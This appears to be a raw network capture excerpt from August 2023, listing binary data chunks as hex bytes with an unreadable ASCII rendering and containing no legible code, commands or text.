                                                                                                                  2023-08-29 17:16:42 UTC856INData Raw: c0 9b 6d c2 45 1f f2 d2 ce 9f 92 a2 41 49 9c 26 30 be 90 9a 41 17 10 50 75 01 1d d0 40 7a d9 90 86 f9 93 91 4d 8a 18 90 e5 7d 17 50 78 49 11 d0 31 4e 93 99 4d c1 17 d8 64 7e f8 e0 45 47 92 11 c6 29 1b d4 25 83 de d0 89 25 00 a8 65 3d 0c 5b 0f 4d 5a cf c6 b0 1b d1 e4 56 1a a5 47 7a cb 59 59 19 11 96 4a 88 1c 50 67 8e 19 0c 44 a9 1c 59 0d 41 6c d5 2f 4d 5b 89 45 43 d0 59 0d 45 98 d4 04 09 15 13 c6 30 11 d2 25 10 e7 b0 8d ca f9 f0 86 ab 17 d1 42 3d 19 c0 cf 4b 9d 10 cd 48 6d 40 4d 08 5b 2f 45 63 6c 20 04 5a 19 13 10 c2 f5 53 a9 59 2a d0 8c f1 19 20 ba b6 38 95 45 b5 38 95 b1 18 94 95 bd 4b 49 50 45 b9 49 2f 30 41 90 d0 08 b1 90 9d b5 a1 73 e9 45 49 19 5b 00 41 9a 14 51 cf d0 94 43 41 1f ba 44 7a d0 a0 43 0f 2f b8 43 89 09 d4 45 1f 99 8d 7d 99 73 d0 2f 45 7a
                                                                                                                  Data Ascii: mEAI&0APu@zM}PxI1NMd~EG)%%e=[MZVGzYYJPgDYAl/M[ECYE0%B=KHm@M[/Ecl ZSY* 8E8KIPEI/0AsEI[AQCADzC/CE}s/Ez
                                                                                                                  2023-08-29 17:16:42 UTC860INData Raw: e4 0a 1b ca f0 fc 14 a5 c4 ea cd 40 66 fb 66 c4 b5 4b 5c 66 3a 61 5d e3 65 a1 75 93 46 5e b8 f2 5a 4b 49 38 51 0b 10 dc 94 41 a5 12 ac 8b 6c 75 24 f9 0d f1 54 81 f9 87 52 bd 14 93 41 79 72 bf 4e 48 46 a5 1b fc 8c 9f b5 a8 03 b0 75 4c bd d0 10 e9 19 c7 01 dd b9 df 35 dd 0f 40 d2 3d 15 90 d6 eb 8a 51 d0 3c f6 41 4e 43 51 d2 44 39 73 d2 ae 5f e9 f4 96 48 5b ca d7 eb f1 60 7c 43 73 d1 64 1b 49 e0 6d 66 8e 57 73 5e 39 cf 47 37 28 30 44 a2 36 90 79 76 73 d0 30 56 9f 88 15 ed f1 03 64 65 73 fd c4 7f 1f 70 45 a0 b9 f3 ae 43 d8 d0 fe 89 19 82 72 b9 1d 50 c8 25 3d 5c c4 a5 c9 31 58 cd f9 c9 a5 cd dc 59 00 39 eb d5 4d 1a 93 c8 e6 4d 4f df fb ba 19 53 bb 0d 4e 5b 38 35 16 94 ca 47 19 f5 4a cd 4c 80 45 ca 13 3e c5 49 eb 01 e6 a7 29 df e9 3c ed 42 00 00 20 00 49 44 41
                                                                                                                  Data Ascii: @ffK\f:a]euF^ZKI8QAlu$TRAyrNHFuL5@=Q<ANCQD9s_H[`|CsdImfWs^9G7(0D6yvs0VdespECrP%=\1XY9MMOSN[85GJLE>I)<B IDA
                                                                                                                  2023-08-29 17:16:42 UTC864INData Raw: 2c 4f 11 a8 9d b6 1f 2f c7 5e 1f 61 31 64 d8 38 41 89 ee 00 ed 48 6d f4 c6 ee 98 72 25 e5 49 38 c6 96 99 c9 45 d4 41 58 a5 b6 e6 d0 58 95 f1 50 c4 6c 43 c3 c7 44 7e 51 48 4b 13 f8 c5 6e 92 d0 08 45 f1 d9 92 b6 e6 55 2d 89 6c eb c4 40 e4 50 73 c9 1c f4 41 cc 04 d1 71 3c 05 2f 30 45 2a 50 5f c8 d2 b2 a7 cb d2 52 59 32 c7 fd 45 6e 12 51 48 49 1f f4 c5 64 38 a5 45 f1 2a 0b 7c 14 f1 59 18 d1 ad 83 31 09 41 10 5c fc c3 11 5b c9 5c 34 2d 39 76 c9 3d c9 04 c5 c7 46 0d 52 4a 75 99 df 23 be 1c 51 04 51 19 c0 31 7c f0 27 85 2c 19 ba 4d f0 f9 94 59 31 f1 d4 f3 9b 18 f0 31 40 38 c8 64 49 69 d4 ce 91 f2 d2 76 92 b8 50 56 1a 49 38 20 89 0a 89 44 67 09 64 ad fb ca d0 6b 3c e1 55 07 bf 5e ac 40 6c 19 c0 45 de d9 d8 4a cd c8 d0 38 cc ef df c1 0f bb 10 44 43 67 85 2f 65 18
                                                                                                                  Data Ascii: ,O/^a1d8AHmr%I8EAXXPlCD~QHKnEU-l@PsAq</0E*P_RY2EnQHId8E*|Y1A\[\4-9v=FRJu#QQ1|',MY11@8dIivPVI8 Dgdk<U^@lEJ8DCg/e
                                                                                                                  2023-08-29 17:16:42 UTC868INData Raw: b5 1b 19 38 17 49 9b 3c 15 49 16 67 00 55 49 00 51 ef 09 d0 4a d8 28 5d 29 78 7a ac 85 7b 18 74 45 6f e4 2f ba c0 5c 34 44 5a 90 29 f3 b6 e6 17 00 b5 10 21 1b a1 10 60 4d c2 5c 34 ad 23 09 40 4d 8a 09 d7 5e 98 1e f4 4f a1 b0 f1 4f fb b6 ff 4f 42 31 da 87 f8 19 d3 6a 43 37 da ba 3c 39 2f 30 55 54 fd 4f 90 08 b1 e6 49 9a 2c 6d 43 4f 49 6a 43 f1 bd d5 41 38 da 3d 0f 38 da 46 f9 3c 44 60 ca f5 f4 c1 89 4a 10 13 1e 16 54 77 4a 29 bb 66 25 59 b5 b1 49 16 66 bd 5d 93 28 45 c2 de 53 8e b6 9a 28 0b 69 66 82 4a cd e4 50 c7 ca f1 50 06 ca e1 da 4a ce c5 60 45 49 16 66 c5 bb f9 c5 3d b6 11 f4 c0 93 79 d0 2d 79 69 c9 0d 31 f0 63 35 48 71 f8 d4 49 b0 85 d4 49 3d 41 45 d6 88 d0 59 d8 19 45 d0 d8 19 c4 d4 49 92 61 41 b1 56 60 30 40 98 d4 cb c4 fb d0 16 46 97 ad 64 cb 19
                                                                                                                  Data Ascii: 8I<IgUIQJ(])xz{tEo/\4DZ)!`M\4#@M^OOOB1jC7<9/0UTOI,mCOIjCA8=8F<D`JTwJ)f%YIf](ES(ifJPPJ`EIf=y-yi1c5HqII=AEYEIaAV`0@Fd
                                                                                                                  2023-08-29 17:16:42 UTC872INData Raw: c5 27 f2 da 7e be 6d d4 55 72 df a6 47 49 2c 9d b1 b6 39 ba 6b 1f f1 95 45 75 9c 10 65 10 40 a4 69 1e 19 40 ad f3 dd b7 ba 4b 1e df c0 a0 19 ea c6 e3 1e 51 4e c9 32 d1 69 c0 5c 24 ac 99 b8 d2 43 b5 f1 25 16 ca 35 d5 c4 65 bd 48 14 cf 35 a5 4d 88 51 6b 06 40 30 10 61 31 4c 1c 61 7d 5c fc b9 a1 1b 61 85 59 94 d4 06 10 90 95 55 b9 f1 f4 08 c9 09 d0 cc 0c 19 3c ce 0c e9 fb 86 c0 6c d0 bd 98 e1 f9 00 b1 a7 74 65 6d 05 a8 ba 7f 1b a3 b5 a1 0b fc 88 5b f1 42 87 5b 4e 83 ad 4b 19 94 6b 3d 14 53 ab 4d 98 d4 bb d1 99 dd 38 8e f2 cc ad cd d4 9c 44 35 09 5b 08 a5 99 e2 25 c0 11 83 ad de d9 d3 c6 7b 4a d8 ad 99 4d 10 59 14 11 89 7c 19 44 2c 31 40 18 f4 fa 49 1d 89 45 c2 5c 24 1b 16 42 19 86 09 73 d0 ba 3d 3d dc 84 49 f1 e6 41 ca b1 53 cf 59 98 5a 44 f4 c7 59 f1 3c e5
                                                                                                                  Data Ascii: '~mUrGI,9kEue@i@KQN2i\$C%5eH5MQk@0a1La}\aYU<ltem[B[NKk=SM8D5[%{JMY|D,1@IE\$Bs==IASYZDY<
                                                                                                                  2023-08-29 17:16:42 UTC876INData Raw: ba 7e 3a d8 f9 6d 11 79 6c ba 44 e3 9e ae 40 b3 61 41 2e 38 4b a8 88 8b 24 28 19 b2 03 4b 6c 10 45 ca 64 10 45 3c 73 5b 18 03 dd c1 52 1a df b1 76 b6 d8 d3 12 80 18 d0 ad 6f da d3 2d 81 59 e5 55 4b 35 22 0f ff 46 23 44 4f ea d1 7c 34 33 0c a4 28 c5 f0 47 86 34 d2 a6 32 18 f2 47 c4 2d 8e c0 bf 6d c1 86 69 17 20 24 4f 7f 53 63 69 09 81 45 25 2a 0b e1 65 78 b2 9b a9 2e b0 27 95 95 59 58 78 18 b1 27 95 f1 1a 74 48 d1 5b 00 99 7f b2 fb c5 78 b2 75 03 19 b8 f9 6d 05 a8 ce b8 f1 50 32 2d e6 2f 82 4f f1 f0 4f 09 92 16 1b 8a de d1 d4 49 f0 50 6d 2c e6 2f 13 c2 e8 a3 44 4d f1 ca 95 49 ef 94 61 41 18 70 31 4e 4f 38 cc b9 0c 89 e5 4b 19 12 41 49 4f 2f 31 6d 11 cd 65 4d 55 f9 41 39 18 d2 02 45 f2 dd c5 b6 6c d8 ad 67 1b 2d 55 58 51 89 31 46 d8 d0 9c 77 da d0 a3 49 d0
                                                                                                                  Data Ascii: ~:mylD@aA.8K$(KlEdE<s[Rvo-YUK5"F#DO|43(G42G-mi $OSciE%*ex.'YXx'tH[xumP2-/OOIPm,/DMIaAp1NO8KAIO/1meMUA9Elg-UXQ1FwI
                                                                                                                  2023-08-29 17:16:42 UTC880INData Raw: ee 99 1d 13 04 79 01 ba 47 23 18 87 04 c0 92 f4 78 a5 89 f6 ba 9e 79 e3 4d a1 d5 b1 8f db 33 10 45 5c 5d b3 29 f9 20 d1 d4 61 f2 df ba 3c c1 2f 30 41 f9 38 04 c9 48 89 1c 7a d9 91 a5 2b 10 80 ad bf 38 50 48 a2 0f 88 f5 04 fa f1 49 ab 38 53 a5 56 19 11 a5 4f 93 85 a2 c9 fb d0 aa c2 20 58 11 4e 1d 5b 45 58 94 ac 47 6d 92 c3 cf 49 4d e2 61 4b cb 00 bf 7b 19 c7 c5 ab 66 e0 52 c2 10 d0 c8 0d 18 f4 ce 42 93 9c 45 78 3d e2 4d c9 f8 af ce 49 0a e2 09 7b 3d 58 4d 8e 52 c0 ca 71 94 c2 34 7e 64 0c 35 f4 20 1d 37 f2 f9 82 9e 58 18 a5 58 99 19 e0 54 48 b9 b3 c6 a8 06 11 a4 4f 92 d2 41 8b 08 5d 01 41 1d 50 65 e3 e7 c1 4e d7 28 dd 86 19 28 68 94 5d 0b b6 74 57 54 34 d0 78 02 38 65 da 39 dc d5 78 f1 d5 35 49 de d0 d4 52 10 b0 57 a0 8c 9d 77 68 f1 27 65 d4 2b fd 98 29 19
                                                                                                                  Data Ascii: yG#xyM3E\]) a</0A8Hz+8PHI8SVO XN[EXGmIMaK{fRBEx=MI{=XMRq4~d5 7XXTHOA]APeN((h]tWT4x8e9x5IRWwh'e+)
                                                                                                                  2023-08-29 17:16:42 UTC884INData Raw: ae 39 1b 01 46 bf fe 01 46 1b 3b c0 61 2f b8 34 35 68 4a e3 9e 4d 7f ed 75 4a 44 28 31 58 7f c4 c4 44 38 d1 ba 99 71 10 ac 6b 0a f0 50 2e 3b b0 f6 2e 3b a5 4c 2f b9 dd ba b6 f0 d1 45 4b 4f 00 77 53 e9 06 77 74 c8 e2 90 55 ce e3 b3 d9 5f e9 58 a1 e9 d4 31 1d 98 ce d5 1f 94 95 99 1c 29 c5 19 db 07 c0 30 6d 9a ed 44 4b 1b df c0 6b ae 50 4f b6 0c b4 75 38 9a 28 75 31 16 55 ed 18 70 12 46 a2 1f d4 cc 7c 68 d0 7c 14 ed df c1 3a a8 eb 76 4c 6c ce 7b 4c b8 e9 95 6a 69 d1 d5 4b 6d bb 23 70 6c 0c 30 c9 99 e9 18 a9 16 54 32 c9 09 91 c1 41 16 b6 7c 14 f3 c0 30 a3 19 59 00 b1 6c e3 ae 43 93 d0 00 a3 23 13 cd 0c e6 a5 45 0d 94 95 a5 19 f1 c7 be c9 e6 2f 7e 8a 40 df c1 9b 96 d0 4a ff 11 df f2 80 90 9d 07 b1 89 d0 05 48 7f 73 e7 58 6c 92 b5 ac 14 b6 ce 0c e1 80 60 80 39
                                                                                                                  Data Ascii: 9FF;a/45hJMuJD(1XD8qkP.;.;L/EKOwSwtU_X1)0mDKkPOu8(u1UpF|h|:vLl{LjiKm#pl0T2A|0YlC#E/~@JHsXl`9
                                                                                                                  2023-08-29 17:16:42 UTC888INData Raw: e4 d9 1b f5 4f 3c 3d 42 47 6f 88 d2 7f 50 88 d2 51 dc 1b a4 9c 19 1b f6 4f 69 4a 5d 08 a1 48 10 49 19 92 50 42 b6 2d d6 ba 5c 75 72 0f 41 16 54 39 59 1b 5b 08 a1 22 c0 8e 46 95 a1 e5 49 22 9d 55 41 16 57 2d 78 18 d7 44 04 e9 70 c8 0d 1f d4 b3 d8 bd 36 35 40 38 a0 42 4b 16 54 53 39 1e eb 8e 49 6d dd ce 04 ed 50 7c 43 11 a5 40 c9 88 e4 c5 69 e2 5b 4d 14 ed 5b a5 4f da eb 9d c0 7d 8d 55 19 f8 df c6 d8 5c 01 e4 48 39 ec 5f 46 9d 7e 85 49 25 dd 05 3d 15 58 46 0a 58 70 50 a0 1b 40 57 60 e9 98 7e 81 6a c7 45 c4 58 d1 c5 71 13 a5 4f cb 58 41 44 8f 1a da ae 3c 69 c7 65 a2 74 2f 00 59 58 b8 ad 19 7c 01 ff b6 62 db 30 43 3a 86 d5 49 5c d0 c6 34 f1 d0 31 76 92 d7 47 bf d9 da 0d 3d 0d 50 38 b6 19 da 31 f0 df d3 48 c2 1e d1 e5 8c 91 9c 43 4c f2 f5 7e 45 44 24 35 80 98
                                                                                                                  Data Ascii: O<=BGoPQOiJ]HIPB-\urAT9Y["FI"UAW-xDp65@8BKTS9ImP|C@i[M[O}U\H9_F~I%=XFXpP@W`~jEXqOXAD<iet/YX|b0C:I\41vG=P81HCL~ED$5
                                                                                                                  2023-08-29 17:16:42 UTC892INData Raw: b0 04 92 02 4e bf 5c 2c e3 4b 9f f8 c5 58 f2 c4 85 5c 93 50 8e 49 3d f0 69 69 ef 08 5e 89 69 90 c5 34 e1 12 68 cc c1 d4 6b 03 50 c1 6b 20 11 d2 6b 7a c2 54 6b 3b b2 50 6b 60 37 ef 53 5e 25 dc 52 7f 19 c7 e1 69 6c ef c5 08 4e e5 c5 0b 08 c8 d9 e1 1e cf 5d 56 01 c1 5d 32 55 db 5d 6b 2d d0 5d 59 6d fe 5e 51 ef d4 55 08 09 a5 99 8d 0e d2 30 9b 8c f0 49 98 dd c7 01 98 0e 39 43 40 5e c6 2e 56 5e 1c 52 39 d6 c7 2f 48 4a 38 ad f6 52 b5 52 86 bf 96 42 12 b8 96 c5 67 92 95 a9 ca a1 7c e5 47 11 d1 3b 58 39 ce 15 23 11 81 55 a1 a4 bb bb 89 1f dc ae 44 1d 5b c5 c8 00 df f3 4d 51 53 f1 a9 11 24 0c 7a f0 c9 81 50 03 1a 5c 89 74 b6 c6 2c e5 d0 25 53 a9 c9 c5 ca 61 d8 45 16 6c c1 21 42 3e 35 5c c9 12 05 74 a5 53 95 5f 82 7f 80 c6 34 e7 d0 27 53 18 b3 5f 5d dc f0 64 59 dc
                                                                                                                  Data Ascii: N\,KX\PI=ii^i4hkPk kzTk;Pk`7S^%RilN]V]2U]k-]Ym^QU0I9C@^.V^R9/HJ8RRBg|G;X9#UD[MQS$zP\t,%SaEl!B>5\tS_4'S_]dY
                                                                                                                  2023-08-29 17:16:42 UTC896INData Raw: 73 c2 d8 11 41 a1 11 f0 6a 0d 23 66 fc 49 d2 5a 94 3c 32 38 32 f6 19 2c ba 8e 19 c6 45 49 19 d0 f5 69 93 00 ae 53 56 e8 45 57 6d fc ce 86 56 55 8c 49 6d c4 c8 07 18 e8 5c 3d 19 dd cd 4f 92 21 cd 5f 5f d0 7e b2 6c 32 ae 58 df d6 cd 69 f2 dc 44 d9 1e 58 4b 48 3d d0 b1 71 44 2c 31 4e 92 95 45 b1 9a b0 35 b4 92 95 4d 49 46 8e 1e 80 da ba 45 b6 11 a4 61 59 1c d6 ad 43 e6 2f 15 b6 9a 14 55 4a 35 c4 4c 4f f1 d2 41 49 61 53 81 5d da 85 ce 49 f5 53 a9 69 4a e3 9e 70 19 8d 51 1f 4e 59 18 b9 90 50 18 bd 6c df 7c 14 11 d1 41 49 15 a5 54 a0 19 d2 45 49 1a d0 4b 49 73 ad 49 72 e2 a7 5b 49 f1 6e fb b5 e6 ba 53 17 1b 83 44 49 90 e0 ad 9a 1c 2d 44 49 7a c4 ce 8f f0 08 44 49 19 d0 ba 3c 01 5d 08 a9 f1 d0 1e a2 e5 2f ce 0c fd e9 45 11 11 a5 62 b6 6c c4 ba 49 6c c0 12 b6 6c
                                                                                                                  Data Ascii: sAj#fIZ<282,EIiSVEWmVUIm\=O!__~l2XiDXKH=qD,1NE5MIFEaYC/UJ5LOAIaS]ISiJpQNYPl|AITEIKIsIr[InSDI-DIzDI<]/EblIll
                                                                                                                  2023-08-29 17:16:42 UTC900INData Raw: f2 16 32 95 4d 10 89 8c 61 ef 35 0c 78 3d 14 2e 97 31 14 cb 35 44 18 40 77 1f f1 8b 2e 48 19 d3 45 8f 40 89 cf 41 ef 09 5e 11 d0 39 cc 7b 39 43 0f 45 15 de 65 eb f4 df 4b 89 f2 b8 46 47 00 d1 4b 63 5c d1 4b 59 11 de 54 49 17 80 44 1d 23 81 44 47 49 d3 4b 8b 19 de 54 44 9a dc 91 59 14 d0 4b 48 ef 94 75 4e 18 de 75 46 9a df f2 16 93 d1 b3 29 c1 cb 85 6a d8 8f 4b 1f 17 ce 00 10 17 c8 46 d2 f1 38 5c 08 17 95 53 a5 59 de 15 67 3b 14 5e 0e a9 2d f0 69 40 24 64 10 e3 e8 6b 6a 88 dc 85 55 89 fb ad 69 bc 6b 4b 7d f5 a5 61 30 c1 f2 ac f5 b9 d1 35 42 73 d1 a5 69 f0 9e e1 39 18 51 02 cb 5f 05 e1 e2 1d 39 c7 a2 b6 d4 85 a2 6a 87 15 b9 50 d0 68 ef e4 2f cc 3c e1 f9 65 0c e1 86 ad 68 a9 d0 46 0c 11 28 7d 57 39 e1 03 62 6c dc 45 72 e1 a7 7a c3 0e ea 96 78 79 f3 cd 1c e6
                                                                                                                  Data Ascii: 2Ma5x=.15D@w.HE@A^9{9CEeKFGKc\KYTID#DGIKTDYKHuNuF)jKF8\SYg;^-i@$dkjUikK}a05Bsi9Q_9jPh/<ehF(}W9blErzxy
                                                                                                                  2023-08-29 17:16:42 UTC904INData Raw: 47 c1 00 21 41 b6 21 ce 45 c0 44 2c 31 1c 16 6e 43 59 49 38 c9 f7 9a 6e 46 0f f2 d0 53 c3 1f 66 fe 49 25 ff 31 44 25 8c 31 40 19 ec 6b 3c 11 59 30 b5 f2 d0 46 c4 67 d1 03 71 07 a5 45 9d 22 2b 31 6c 20 8d 51 49 6d cb ce 8e 32 95 4d 70 19 95 5d 3f 64 80 ba 3c 11 d0 2f b6 e6 a5 51 a1 ee 17 45 b5 e6 53 81 59 90 ad 4d 49 f2 d9 ce 0c 0d eb 86 3d 59 d2 cd 51 92 95 b9 49 09 9a 45 72 5c d8 37 0c 20 8d 59 0d 6d c9 47 27 39 a6 00 4c 77 cc 41 a1 a6 d3 2b 70 44 f4 4a cd 19 7b 45 49 19 fb 30 b5 20 d0 30 61 6f f3 13 b6 6c 2c d4 48 38 f4 ad d4 1a f1 ac c4 19 cd 44 48 5d af 6e 3c 11 e9 30 69 39 a7 23 c2 5c dc 45 14 1e e9 fd 14 09 a6 47 22 18 a4 45 44 01 d3 48 e3 05 d3 48 69 1a dd 61 4a 14 f8 44 44 19 38 de c7 e5 2f 7c 14 11 90 30 5f 73 c6 1b 1a 18 d0 cc 59 29 38 ee 9c 18
                                                                                                                  Data Ascii: G!A!ED,1nCYI8nFSfI%1D%1@k<Y0FgqE"+1l QIm2Mp]?d</QESYMI=YQIEr\7 YmG'9LwA+pDJ{EI0 0aol,H8DH]n<0i9#\EG"EDHHiaJDD8/|0_sY)8
                                                                                                                  2023-08-29 17:16:42 UTC908INData Raw: bb 70 6c f8 6d 3f 31 70 3f b5 d8 d4 61 a1 2b 8b a6 42 f0 49 a5 4a 19 d9 4a cd 10 51 4a 62 e8 31 41 69 6e be ce 98 59 90 86 3d 11 d0 69 3f 9a de 84 46 4c 10 44 51 dd d1 59 8a 18 f0 81 48 3d d5 86 48 31 12 44 72 d2 a5 5e a1 19 b4 3f b5 e6 ba 53 17 4a 91 44 49 90 e0 ad 30 d8 b2 02 c2 39 16 ae 67 f1 99 05 4a 20 8d 45 b1 6c 30 2f 6b 40 59 4d 69 92 11 ae 52 4f 94 52 8e 9b d7 27 5b fa d9 04 40 2a 10 1a 17 42 d2 8c e8 58 5b 08 51 ee 09 5e 01 d0 68 45 e9 36 f3 8d 69 b4 c8 5d c2 54 c4 64 4b 99 d1 ce 04 09 df 65 6f 9a d1 45 5e 99 d3 55 be c1 cb 75 89 9a 30 46 c9 be 90 1e 41 f1 92 e8 49 9e 53 81 6d 44 22 0f cb 4c 3b 0f 3f fa 9a 2a af 53 b5 a6 03 47 85 a3 03 4d 33 0f 04 f8 9a 06 e8 5b 93 90 ba 53 e8 45 0d 00 33 0f 41 fa 9a 65 5a 49 82 ad a8 98 c0 0e f4 1c 9b 9b e4 0c
                                                                                                                  Data Ascii: plm?1p?a+BIJJQJb1AinY=i?FLDQYH=H1Dr^?SJDI09gJ El0/k@YMiROR'[@*BX[Q^hE6i]TdKeoE^Uu0FAISmD"L;?*SGM3[SE3AeZI
                                                                                                                  2023-08-29 17:16:42 UTC912INData Raw: 7e b6 03 21 5f bf 89 c7 ba 53 6c c9 6b 46 e2 2f 5f 38 18 c6 37 48 ea ca 74 43 8b c5 86 53 db 86 87 6c 09 13 ac 04 99 d0 66 42 9c 81 e7 3c 38 db e5 2b e5 2f 17 d7 70 f4 4e fd b0 f6 4e 6e b9 da e7 66 09 d7 d1 40 f9 da e1 43 49 59 30 a1 90 b0 30 a9 e6 85 4d 39 1c c3 68 41 18 d2 42 45 71 e5 b4 5a 61 38 2b de 0d d7 40 5a 8e d1 38 de 18 c5 46 9d f9 d4 51 31 f1 b5 5a 4a 8d d1 c4 8f 18 41 44 1f 4e 5b b5 c2 e0 3b e5 6b 93 d7 ba 05 39 c8 3e e9 66 d0 02 ca 27 2f 30 58 f1 0c 47 28 29 db 7d 63 6c de f5 76 1d 38 21 29 18 53 39 6d 15 d0 c1 36 ce 01 ef c4 b5 f4 49 89 50 c8 c4 a5 6d 90 36 3b 9f e3 80 c0 9d 55 b5 a9 02 83 ce d4 e5 b0 45 68 99 c0 12 c2 a4 d4 95 48 e6 65 44 19 7e d0 c8 04 81 59 38 9d 19 59 30 e5 90 a5 a1 c0 6c d0 f9 c0 6c 0c cc 3c d9 59 45 3c a9 59 30 f1 f1
                                                                                                                  Data Ascii: ~!_SlkF/_87HtCSlfB<8+/pNNnf@CIY00M9hABEqZa8+@Z8FQ1ZJADN[;k9>f'/0XG()}clv8!)S9m6IPm6;UEhHeD~Y8Y0ll<YE<Y0
                                                                                                                  2023-08-29 17:16:42 UTC916INData Raw: 67 4d ef 55 44 0d 99 17 00 7d 09 c1 45 4e 16 54 33 49 3a 5a 00 69 19 d4 14 8f 5c 98 75 c1 5c f0 0c 8e 5c 94 47 49 01 39 1b 48 19 c7 ce 0c 41 53 bd 2a 16 d0 c2 0f ef 2f ba 88 f9 d4 45 70 64 a0 30 2f 94 5c 40 4b dd d0 b7 70 20 a5 4e 8e 18 da 41 c8 0d 7a 45 01 4a 2f 30 25 09 ba 41 a0 10 d0 40 2f ee 13 45 49 09 a4 0a 70 64 a4 4a 1d 9d e3 4d 6b 18 d7 67 68 13 f2 40 0c 18 f2 20 4c 3b d5 ac 8d 99 d7 ce 4b 95 d2 e9 c2 18 5b 14 4d f0 d2 40 c9 14 26 86 69 6d bf b3 59 da 90 31 71 19 fc 30 59 9a d0 00 35 1d 5b 00 35 16 6f 75 09 e5 39 f6 c8 0e d4 77 d5 ec d9 40 7b 6d bb 41 87 16 6f 45 a0 0f 40 45 58 98 cb 48 cc 02 67 05 b5 4d 3b 3b 4c 03 b7 42 53 2f d5 5f fe b1 d0 ae 17 18 e7 19 48 02 dc 41 52 30 d0 aa a2 51 55 5f 78 9f ca 30 62 28 16 76 46 9d 46 c5 53 1b e2 44 18 19
                                                                                                                  Data Ascii: gMUD}ENT3I:Zi\u\\GI9HAS*/Epd0/\@Kp NAzEJ/0%A@/EIpdJMkgh@ L;K[M@&imY1q0Y5[5ou9w@{mAoE@EXHgM;;LBS/_HAR0QU_x0b(vFFSD
                                                                                                                  2023-08-29 17:16:42 UTC920INData Raw: 0b 7f 6d f0 2a ec 30 af e5 17 f8 c2 fd 79 88 90 50 34 f1 b3 25 5a 6d 98 45 48 19 a3 30 5a 9a 28 4c 35 10 90 c6 b1 14 df cb 19 99 d4 c6 59 e1 f0 30 66 19 d3 3e 46 9c d2 04 89 18 df fb 14 e9 e3 97 49 92 18 c6 a8 1e 92 96 ab 19 5b 8d 88 e0 d3 4a f7 95 d4 48 2d 79 df 76 82 9c 01 4a e5 9d cc c5 4d 3a c8 49 6b 18 21 45 72 3b 27 e5 4a 91 95 f5 cb 06 03 f8 42 ba 49 c7 62 23 70 4a c1 5c 61 c8 41 5c 40 15 09 4f 17 00 e1 26 59 e4 1b a9 7c e5 49 94 95 f5 c9 33 d0 ed 19 f1 92 f9 b4 e6 b6 4d c2 5c 78 a5 54 7f 59 43 0f 11 96 ac e5 b9 d9 c6 a1 69 df c1 cd ed d2 44 4a 16 54 42 e9 92 70 0d 01 16 54 a2 4c 1b b5 24 1f 49 38 46 3d 3d d0 cd 72 b9 fe c0 eb 0e d0 60 b7 54 3e 46 5a a6 70 3c 81 92 95 e5 29 96 39 f1 4b 62 95 63 49 5e 50 7a 17 92 27 30 4e 19 5d 32 48 df 95 b5 b6 73
                                                                                                                  Data Ascii: m*0yP4%ZmEH0Z(L5Y0f>FI[JH-yvJM:Ik!Er;'JBIb#pJ\aA\@O&Y|I3M\xTYCiDJTBpTL$I8F==r`T>FZp<)9KbcI^Pz'0N]2Hs
                                                                                                                  2023-08-29 17:16:42 UTC924INData Raw: 06 48 99 80 45 48 92 ad a1 ca 59 8e 51 4c a6 70 1b 36 d9 ca b3 0c f1 d2 65 4a 02 59 18 9d 16 54 f9 48 19 e3 c0 92 6c d9 ce 54 e5 d8 58 55 61 f0 44 ca 7c 30 45 89 9c 2f ce ba 16 5e 94 c4 5b 9c 59 cd da 40 45 79 2c 50 d2 18 49 38 47 a9 ea b8 1c 3d 18 96 03 b6 19 95 a5 70 64 30 39 90 f0 b2 e4 59 1b 53 ad 11 fa a6 05 44 71 61 15 15 16 54 72 79 1e 01 48 ca c9 d1 cd 46 ae d3 95 4e 2a 26 03 4b 11 d4 30 81 18 ea 00 d1 6d fd cd 69 5c 6c c8 0c 85 a0 de d5 df c4 00 f4 5f 4b f9 09 82 3c 15 a1 1f 9a d5 2b 19 4b c0 89 64 d9 cc 49 6c 7c ae 4d 7f 59 00 a5 18 50 44 c0 5c 04 cc 3c f9 39 63 65 28 5c 14 4c 9c 10 95 4d 6d fd c5 c2 51 d4 c0 80 6d f6 94 46 09 d0 4d 46 a6 b0 51 9d 6d df 0d d0 32 12 f1 50 f0 27 04 51 7c 80 8d 49 f0 20 c5 49 b8 22 4b 0c 19 04 15 a1 f7 f5 b8 b6 40
                                                                                                                  Data Ascii: HEHYQLp6eJYTHlTXUaD|0E/^[Y@Ey,PI8G=pd09YSDqaTryHFN*&K0mi\l_K<+KdIl|MYPD\<9ce(\LMmQmFMFQm2P'Q|I I"K@
                                                                                                                  2023-08-29 17:16:42 UTC928INData Raw: 2d 59 68 8b 4d c2 94 54 45 02 46 e3 88 17 19 38 8f 2e e5 2f c4 8c 91 d1 a5 49 d0 13 2f 6c 0e a8 d6 4c 29 d0 f6 79 19 c1 63 5e 61 01 40 79 19 0a 75 49 60 f7 52 31 71 d0 6d 5e 61 5d 01 6d 15 80 55 b6 6d f4 49 78 19 38 eb b9 08 00 48 8d 15 13 15 48 11 80 2f 13 19 e2 44 d3 2d d1 85 49 11 f4 44 ce 18 f7 44 4d f1 27 f0 b4 e6 b6 44 f9 83 89 30 4d 9a de ba 8a 99 2f 43 8a 4c 5d e9 6d 39 db 55 b6 98 3c 35 79 11 71 a5 50 99 cc 3d 7a dc 59 c0 a5 39 89 55 1a 92 4d 45 79 18 86 ce fc 5b 28 95 49 4e 2f f0 b5 79 d0 76 49 e6 5d 08 d1 90 8d 9d c0 19 ad ed c0 64 38 cc 34 dd d0 cc 34 fd 59 38 85 90 ad 45 e5 90 ad 8d a1 81 ec b9 da 29 29 45 b0 d7 df 4e b0 fb 86 91 31 33 74 d7 59 b9 05 3d 73 99 b7 4a fe 19 c6 23 72 ce 59 38 99 90 d0 38 a9 90 ad f9 c0 64 64 05 c0 4c 0c 4a cd 16
                                                                                                                  Data Ascii: -YhMTEF8./I/lL)yc^a@yuI`R1qm^a]mUmIx8HH/D-IDDM'D0M/CL]m9U<5yqP=zY9UMEy[(IN/yvI]d844Y8E))EN13tY=sJ#rY88ddLJ
